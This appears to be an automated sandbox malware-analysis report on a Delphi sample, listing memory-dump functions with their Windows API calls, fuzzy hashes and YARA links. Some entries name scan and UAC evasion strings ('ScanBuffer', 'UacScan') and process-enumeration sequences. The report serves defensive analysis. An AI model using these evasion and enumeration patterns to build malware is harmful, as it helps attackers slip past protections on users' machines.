                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                                        • String ID:
                                                                        • API String ID: 1478290883-0
                                                                        • Opcode ID: 96d4c61cb17e807afaabe76f8f240f87b61580704cc032bdd6b5b016d2e8bfe5
                                                                        • Instruction ID: 3db70118c576f5d88224e8487b1e12235293dc40d5e686ccd847789fde1d9991
                                                                        • Opcode Fuzzy Hash: 96d4c61cb17e807afaabe76f8f240f87b61580704cc032bdd6b5b016d2e8bfe5
                                                                        • Instruction Fuzzy Hash: 442124B0680310AFE754FBB8DC46B6EF79EDB04700F500961BE08E7280DA75E994AA1D
                                                                        Function 02C66D6C Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CLSIDFromProgID.OLE32(00000000,?,00000000,02C66DB9,?,?,?,00000000), ref: 02C66D99
                                                                          • Part of subcall function 02C54C60: SysFreeString.OLEAUT32(02C6F4A4), ref: 02C54C6E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: FreeFromProgString
                                                                        • String ID:
                                                                        • API String ID: 4225568880-0
                                                                        • Opcode ID: 203c76a356b2003e41db77301a1da4211a9bb7f9d4c4b3125172527ee037c345
                                                                        • Instruction ID: 5818da033c217fa44b0342000fa48607402b77578bfb2293772f169bd1dc873b
                                                                        • Opcode Fuzzy Hash: 203c76a356b2003e41db77301a1da4211a9bb7f9d4c4b3125172527ee037c345
                                                                        • Instruction Fuzzy Hash: 71E0ED75200718BBE325EF66DC81DAE77ADDB8A700B6104B1E800D3600DA39AE40A8A8
                                                                        Function 02C55868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(02C50000,?,00000105), ref: 02C55886
                                                                          • Part of subcall function 02C55ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C50000,02C7E790), ref: 02C55AE8
                                                                          • Part of subcall function 02C55ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C50000,02C7E790), ref: 02C55B06
                                                                          • Part of subcall function 02C55ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C50000,02C7E790), ref: 02C55B24
                                                                          • Part of subcall function 02C55ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02C55B42
                                                                          • Part of subcall function 02C55ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02C55BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02C55B8B
                                                                          • Part of subcall function 02C55ACC: RegQueryValueExA.ADVAPI32(?,02C55D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02C55BD1,?,80000001), ref: 02C55BA9
                                                                          • Part of subcall function 02C55ACC: RegCloseKey.ADVAPI32(?,02C55BD8,00000000,?,?,00000000,02C55BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02C55BCB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Open$FileModuleNameQueryValue$Close
                                                                        • String ID:
                                                                        • API String ID: 2796650324-0
                                                                        • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                        • Instruction ID: bbee26b6fc895d25419e747dbb8cdbc83f471aee4aa9c22f0b0d6f38a6f7df14
                                                                        • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                        • Instruction Fuzzy Hash: 54E06D71A403248FCB10DE98C8C0B5633D8AF487A0F4409A1EC58CF246D7B0DA908BD4
                                                                        Function 02C57DE0 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02C57DF4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                        • Instruction ID: 0969b2f74065261bbfd8eab9378983371a474520a408e9793a711317cdb5e913
                                                                        • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                        • Instruction Fuzzy Hash: 2AD05BB23092507AE224965A5D44EAB5BDCCBC6770F10073DF958C7180D760CC45C675
                                                                        Function 02C6ADD8 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 02C6AB1C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02C6ADA3,?,?,02C6AE35,00000000,02C6AF11), ref: 02C6AB30
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02C6AB48
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02C6AB5A
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02C6AB6C
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02C6AB7E
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02C6AB90
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02C6ABA2
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02C6ABB4
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02C6ABC6
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02C6ABD8
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02C6ABEA
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02C6ABFC
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02C6AC0E
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02C6AC20
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02C6AC32
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02C6AC44
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02C6AC56
                                                                        • Process32Next.KERNEL32(?,00000128), ref: 02C6ADE9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$HandleModuleNextProcess32
                                                                        • String ID:
                                                                        • API String ID: 2237597116-0
                                                                        • Opcode ID: 80d4906f37cff11d52340696f4a2f34708f82e0a8c702969cae5e494787003cc
                                                                        • Instruction ID: e12c7682e4dae8dcd91363557d9f5d245673429dac68af682a5b848280eb2e78
                                                                        • Opcode Fuzzy Hash: 80d4906f37cff11d52340696f4a2f34708f82e0a8c702969cae5e494787003cc
                                                                        • Instruction Fuzzy Hash: B5C012A26022201B8A1066F828C8AE3978DC98A2AA30448A2A508E2102EA258C10A2A0
                                                                        Function 02C6ADB8 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 02C6AB1C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02C6ADA3,?,?,02C6AE35,00000000,02C6AF11), ref: 02C6AB30
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02C6AB48
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02C6AB5A
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02C6AB6C
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02C6AB7E
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02C6AB90
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02C6ABA2
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02C6ABB4
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02C6ABC6
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02C6ABD8
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02C6ABEA
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02C6ABFC
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02C6AC0E
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02C6AC20
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02C6AC32
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02C6AC44
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02C6AC56
                                                                        • Process32First.KERNEL32(?,00000128), ref: 02C6ADC9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$FirstHandleModuleProcess32
                                                                        • String ID:
                                                                        • API String ID: 2774106396-0
                                                                        • Opcode ID: 6f84d78ba37dc2ba65fd8101fcd27e8862628f982f22f80d27c649d3d0b75779
                                                                        • Instruction ID: 346e3ce186c16a6d2df71324b8809a036c81fdd48744678a3ec8dcb36ff72f96
                                                                        • Opcode Fuzzy Hash: 6f84d78ba37dc2ba65fd8101fcd27e8862628f982f22f80d27c649d3d0b75779
                                                                        • Instruction Fuzzy Hash: 66C0807271222017CB1076F43CCC5D3578DCD851B730405B2F508F3101E7254C10A2D0
                                                                        Function 02C57E80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesA.KERNEL32(00000000,?,02C7356F,ScanString,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,ScanBuffer,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,Initialize), ref: 02C57E8B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                        • Instruction ID: 1cc96caad34d7fdb090fc0dd8091a6918131d2bfe0941fad2c1e6bc7725e0e5b
                                                                        • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                        • Instruction Fuzzy Hash: 8EC08CF22117300E1E60A9BC1CC822943CD49C41357A01E21EC38CA2C1D766D8EA382C
                                                                        Function 02C57E5C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesA.KERNEL32(00000000,?,02C7041F,ScanString,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,ScanString,02CD7380,02C7B7B8,UacScan,02CD7380,02C7B7B8,UacInitialize), ref: 02C57E67
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                        • Instruction ID: b22c15292c671022a062c0ccaf91bc88e9b1b1e898434834da2b54eaf3676ddb
                                                                        • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                        • Instruction Fuzzy Hash: D0C08CA02013A00E5A6469BD2CC824953CE49842393A40A21EC38C62E2D77AD8EB381C
                                                                        Function 02C54C78 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: FreeString
                                                                        • String ID:
                                                                        • API String ID: 3341692771-0
                                                                        • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                        • Instruction ID: 43f81b37e4c39fc67dabc0bf7aa4b1687c56c8107e1c7a0f5dd361be44dede21
                                                                        • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                        • Instruction Fuzzy Hash: F7C012A260063057EB355A99ACC475262CC9B85294B1800A1A805D7251E760E98056A9
                                                                        Function 02C7C35C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • timeSetEvent.WINMM(00002710,00000000,02C7C350,00000000,00000001), ref: 02C7C36C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Eventtime
                                                                        • String ID:
                                                                        • API String ID: 2982266575-0
                                                                        • Opcode ID: 4d6e40708f20def14488d0f64afd2017000ecad35a5dc34658a18cde7da1205a
                                                                        • Instruction ID: 901dbfd0d4fb3feebb17e15746f77da53283dd69bfa330db4961b4fb371f999a
                                                                        • Opcode Fuzzy Hash: 4d6e40708f20def14488d0f64afd2017000ecad35a5dc34658a18cde7da1205a
                                                                        • Instruction Fuzzy Hash: FCC048F1B943022AFA1096A5AC82F721A9DD705B10F200412BA08EE2C1E2A29A605E68
                                                                        Function 02C54C38 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02C54C3F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AllocString
                                                                        • String ID:
                                                                        • API String ID: 2525500382-0
                                                                        • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                        • Instruction ID: dce14679a069ae0b0590d44f552e073007f804fdd696d4932a3673784d490cee
                                                                        • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                        • Instruction Fuzzy Hash: 98B0922420862115EA2C2A620E00732008D1BC0286F8900519E18C8091EB80D1C1983E
                                                                        Function 02C54C50 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SysFreeString.OLEAUT32(00000000), ref: 02C54C57
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: FreeString
                                                                        • String ID:
                                                                        • API String ID: 3341692771-0
                                                                        • Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                        • Instruction ID: 1fb9746f026ce6f02ea31d5bc0eb9347db5992d369609ce569450f4ad87dcc6e
                                                                        • Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                        • Instruction Fuzzy Hash: D2A011A8000A220A8A2A2A28082022A2A322EC0200388C0A88A000A0028E2AC080A828
                                                                        Function 02C515CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02C51A03), ref: 02C515E2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: db963b57d7ef63c3f1de3644e080dbfe5d1ea751b856e170bfdf18fa533a27a4
                                                                        • Instruction ID: 34b7319684b887777c2c7d4715ee8c5346d4ecfdc0abad0f033984a1db881fcd
                                                                        • Opcode Fuzzy Hash: db963b57d7ef63c3f1de3644e080dbfe5d1ea751b856e170bfdf18fa533a27a4
                                                                        • Instruction Fuzzy Hash: 93F049F0B423004FDB19CFB999843027AE2E78A345F158679D709DB388EBB18401CF04
                                                                        Function 02C51682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 02C516A4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: f8f860cccfe07de5303ebbca823ef7100e01514f163935e84ce7544e683da368
                                                                        • Instruction ID: eb28abbd39e959db9c24ee3eb04387ddcb7cc42bff1a7e57922c0b3307c89f92
                                                                        • Opcode Fuzzy Hash: f8f860cccfe07de5303ebbca823ef7100e01514f163935e84ce7544e683da368
                                                                        • Instruction Fuzzy Hash: 5AF090B2A416A96BD7109E5AACC4792BB98FB40314F160239EA0CD7340D7B0A850CB98
                                                                        Function 02C516E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02C51FE4), ref: 02C51704
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
